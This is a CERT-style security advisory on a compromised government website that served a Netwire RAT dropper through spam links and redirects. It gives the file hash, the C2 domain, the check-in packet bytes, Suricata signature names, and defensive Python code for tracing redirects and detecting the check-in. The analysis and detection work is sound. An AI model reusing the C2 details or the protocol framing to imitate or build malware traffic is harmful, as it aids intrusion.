CSP-CERT® Security Advisory:
Compromised Website Hosting Malware Which Is Typical of a Watering Hole Attack

by CSP-CERT® Research Science
posted September 2016

CSP CERT® has provided an advisory to the https://compromised.gov.ph site, which as of this date has been remediated from the watering hole attack.

CSP CERT® wishes to advise you of an executable residing at https://compromised.gov.ph[REDACTED]. When we tried to download the file, it was still there.

The screenshot below shows the current date and time along with the actual download of the file Chronopost-Colis.exe.

Compromised URL investigation

Checking the download URL, we found it referenced at http://www.malekal.com[REDACTED], which reports that the URL https://compromised.gov.ph[REDACTED] is being used in a malware spam campaign. The mail as shown on that site:

Notice the link used in the images:

When we tried to go to the URL used in the images, it went through a series of redirects which ultimately led us to the download of the executable file.

Partial Wireshark output

Upon accessing the link, the server replied with a 301 Moved Permanently, which redirects the browser to the location specified in the response.

The specified location in turn redirects to two sites, as shown in the screenshot below: one via window.location.href and one via an iframe.

Partial code of a.html:

The URL loaded by the iframe was not found.

Chronopost-Colis.exe from https://compromised.gov.ph/[REDACTED] was downloaded.
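The redirect chain described above (a 301, then a page that forwards the browser both via window.location.href and via an iframe) is something a responder can walk offline from captured responses. The following is an added example written for this advisory, not tooling from CSP-CERT: the hostnames, the a.html body and the replacement for the advisory's redacted path are all constructed placeholders, and the "second" iframe target is deliberately left unresolvable to mirror the iframe URL that was not found.

```python
"""Walk a phishing redirect chain offline: HTTP 3xx Location headers,
meta refresh, window.location.href assignments and iframe sources."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed sample chain modelled on the advisory's description: a tracking
# link answers 301, a.html then forwards via window.location.href and an iframe.
# All hostnames and paths are placeholders, not the advisory's redacted URLs.
SAMPLE_CHAIN = {
    "http://link.example/track": (301, {"Location": "http://hop.example/a.html"}, None),
    "http://hop.example/a.html": (200, {"Content-Type": "text/html"}, """<html><body>
<script>window.location.href = "https://compromised.example/redacted-path/Chronopost-Colis.exe";</script>
<iframe src="http://second.example/x.html" width="0" height="0"></iframe>
</body></html>"""),
    "https://compromised.example/redacted-path/Chronopost-Colis.exe":
        (200, {"Content-Type": "application/octet-stream"}, None),
    # http://second.example/x.html is deliberately absent: the iframe target is not found.
}

_LOCATION_RE = re.compile(
    r"(?:(?:window|document|top|self|parent)\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]"
    r"|location\.(?:replace|assign)\(\s*['\"]([^'\"]+)['\"]")
_META_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"\s]+)", re.I)


class _HopParser(HTMLParser):
    """Collect onward URLs from iframe/frame src, meta refresh and inline script."""

    def __init__(self):
        super().__init__()
        self.hops = []          # list of (kind, raw_url) in document order
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame") and a.get("src"):
            self.hops.append(("iframe", a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = _META_URL_RE.search(a.get("content") or "")
            if m:
                self.hops.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for location assignments in them.
        if self._in_script:
            for m in _LOCATION_RE.finditer(data):
                self.hops.append(("location.href", m.group(1) or m.group(2)))


def next_hops(status, headers, body, base_url):
    """Return [(kind, absolute_url), ...] for every onward hop this response causes."""
    hops = []
    location = {k.lower(): v for k, v in headers.items()}.get("location")
    if 300 <= status < 400 and location:
        hops.append(("http-redirect", urljoin(base_url, location)))
    if body:
        parser = _HopParser()
        parser.feed(body)
        hops.extend((kind, urljoin(base_url, url)) for kind, url in parser.hops)
    return hops


def walk_chain(start, fetch, max_hops=10):
    """Follow every hop breadth-first. `fetch(url)` returns (status, headers, body)
    or None when the URL does not resolve. Returns (trail, unresolved)."""
    seen, queue, trail, unresolved = set(), [("start", start)], [], []
    while queue and len(trail) < max_hops:
        kind, url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        trail.append((kind, url))
        response = fetch(url)
        if response is None:
            unresolved.append(url)
            continue
        queue.extend(next_hops(*response, base_url=url))
    return trail, unresolved


if __name__ == "__main__":
    trail, missing = walk_chain("http://link.example/track", SAMPLE_CHAIN.get)
    for kind, url in trail:
        print(f"{kind:14} {url}")
    print("unresolved:", missing)
```

Because `fetch` is a plain callable, the same walker runs over a dictionary of saved responses (as here) or over a live fetcher in an isolated analysis network; the breadth-first walk with a `seen` set and a hop limit keeps looping redirects from running away.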

Malware Analysis

File md5 hash: cd144cdec9f3d28d277a484bb731537f

Checking VirusTotal with the md5 hash cd144cdec9f3d28d277a484bb731537f shows a hit with many detections, confirming that it is a malicious file.


Network Analysis

Upon execution, it tries to connect to resultip.ddns.net.

The screenshot below shows the DNS query for resultip.ddns.net.

It then sends a 69-byte packet of data to the CNC.

The CNC replies with its own 69-byte packet.

Notice that the first few bytes of both packets are:

Malware to CNC: 41 00 00 00 03

CNC to malware: 41 00 00 00 05

The screenshot below shows part of the data sent and received.

Suricata Detection

ET TROJAN Netwire RAT Check-in

ET TROJAN Possible Netwire RAT Client HeartBeat C2

ET TROJAN Netwire RAT Client HeartBeat
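The check-in exchange described under Network Analysis and the Suricata signatures listed above rest on the same observation: both 69-byte packets begin with 41 00 00 00 followed by an opcode byte (03 from the implant, 05 from the CNC). Reading 41 00 00 00 as a 4-byte little-endian length gives 65, and 65 + 4 = 69 matches the observed packet size. That framing, and the meaning attached to the two opcodes, are assumptions made for the added example below; it is not part of the advisory or of the ET rule set, and the 64 payload bytes following each prefix are constructed filler.

```python
"""Flag the Netwire-style check-in exchange observed in the advisory:
a 4-byte little-endian length prefix, a 1-byte opcode, then an opaque body."""
import struct

# Opcode meanings are assumed from the advisory's two packets, not from a spec.
OPCODES = {0x03: "client check-in", 0x05: "server reply"}

# Constructed sample payloads: the 5-byte prefixes are the ones shown in the
# advisory; the 64 bytes that follow are filler standing in for the real body.
CLIENT_CHECKIN = bytes.fromhex("41 00 00 00 03") + bytes(range(64))
SERVER_REPLY = bytes.fromhex("41 00 00 00 05") + bytes(range(64, 128))
HTTP_REQUEST = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"   # benign control


def parse_frame(data):
    """Return (declared_len, opcode, body) or None when shorter than the header."""
    if len(data) < 5:
        return None
    (declared,) = struct.unpack("<I", data[:4])
    return declared, data[4], data[5:]


def classify(data, to_server):
    """Label one TCP payload, or return None.

    This is the byte-pattern match a signature would express on the first five
    bytes, tightened with the check that the length field accounts for every
    byte after itself (65 + 4 = 69 for the packets in the advisory) and that the
    opcode matches the direction of the packet."""
    frame = parse_frame(data)
    if frame is None:
        return None
    declared, opcode, _body = frame
    if declared != len(data) - 4:
        return None
    if to_server and opcode == 0x03:
        return "Netwire RAT check-in (client -> CNC)"
    if not to_server and opcode == 0x05:
        return "Netwire RAT check-in reply (CNC -> client)"
    return None


def scan_flow(packets):
    """packets: iterable of (to_server, payload); returns [(index, label), ...]."""
    alerts = []
    for i, (to_server, payload) in enumerate(packets):
        label = classify(payload, to_server)
        if label:
            alerts.append((i, label))
    return alerts


if __name__ == "__main__":
    flow = [(True, HTTP_REQUEST), (True, CLIENT_CHECKIN), (False, SERVER_REPLY)]
    for index, label in scan_flow(flow):
        print(f"packet {index}: {label}")
```

The length check only holds when a whole frame arrives in one TCP segment; on reassembled streams the same logic should be applied to the reassembled data rather than to individual segments, which is what Suricata's stream engine does before the ET signatures above are evaluated.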